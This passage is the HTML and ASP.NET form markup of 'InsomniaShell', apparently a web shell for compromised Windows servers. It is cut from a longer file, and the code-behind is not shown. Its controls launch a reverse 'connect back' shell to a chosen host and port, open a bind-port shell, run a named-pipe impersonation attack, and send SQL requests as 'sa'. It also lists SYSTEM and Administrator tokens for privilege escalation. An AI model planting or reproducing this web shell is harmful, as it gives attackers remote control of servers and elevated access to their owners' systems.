</script><html><head runat="server">    <title>InsomniaShell</title></head><body>    <form id="form1" runat="server">    <div>    <asp:Label ID="Label10" runat="server" Height="26px" Text="InsomniaShell" Width="278px" Font-Bold="True"></asp:Label><br />    <asp:Label ID="Label5" runat="server" Height="26px" Text="Current Context" Width="278px" Font-Bold="True"></asp:Label><br />        <%        DisplayCurrentContext();%>        <br />        <asp:Label ID="Label1" runat="server" Height="26px" Text="Select Your Shell" Width="278px" Font-Bold="True"></asp:Label><br />        <br />        <asp:Label ID="Label2" runat="server" Text="Host" Width="198px"></asp:Label>        <asp:Label ID="Label3" runat="server" Text="Port" Width="101px"></asp:Label><br />        <asp:TextBox ID="txtRemoteHost" runat="server" Width="191px"></asp:TextBox>        <asp:TextBox ID="txtRemotePort" runat="server" Width="94px"></asp:TextBox><br />        <asp:Button ID="butConnectBack" runat="server" OnClick="butConnectBack_Click" Text="Connect Back Shell"            Width="302px" /><br />        <br />        <asp:Label ID="Port" runat="server" Text="Port" Width="189px"></asp:Label><br />        <asp:TextBox ID="txtBindPort" runat="server" Width="91px"></asp:TextBox><br />        <asp:Button ID="butBindPort" runat="server" OnClick="butBindPort_Click" Text="Bind Port Shell"            Width="299px" /><br />        <br />                <asp:Label ID="Label7" runat="server" Height="26px" Text="Named Pipe Attack" Width="278px" Font-Bold="True"></asp:Label><br />        <br />        <asp:Label ID="Label6" runat="server" Text="Pipe Name" Width="198px"></asp:Label><br />        <asp:TextBox ID="txtPipeName" runat="server" Text="InsomniaShell" Width="191px"></asp:TextBox><br />        <asp:Button ID="Button1" runat="server" OnClick="butCreateNamedPipe_Click" Text="Create Named Pipe" Width="400px" /><br />        <asp:Label ID="Label8" runat="server" Text="SQL User" Width="198px"></asp:Label>        <asp:Label ID="Label9" runat="server" Text="SQL Pass" Width="101px"></asp:Label><br />        <asp:TextBox ID="txtSQLUser" runat="server" Width="191px">sa</asp:TextBox>        <asp:TextBox ID="txtSQLPass" runat="server" Width="94px"></asp:TextBox><br />        <asp:Button ID="Button3" runat="server" OnClick="butSQLRequest_Click" Text="Make SQL Request" Width="400px" /><br />        <br />                            <asp:Label ID="Label4" runat="server" Height="26px" Text="Available SYSTEM/Administrator Tokens" Width="400px" Font-Bold="True"></asp:Label><br />        <br />        <%   DisplayAvailableTokens(); %>                </div>    </form></body></html>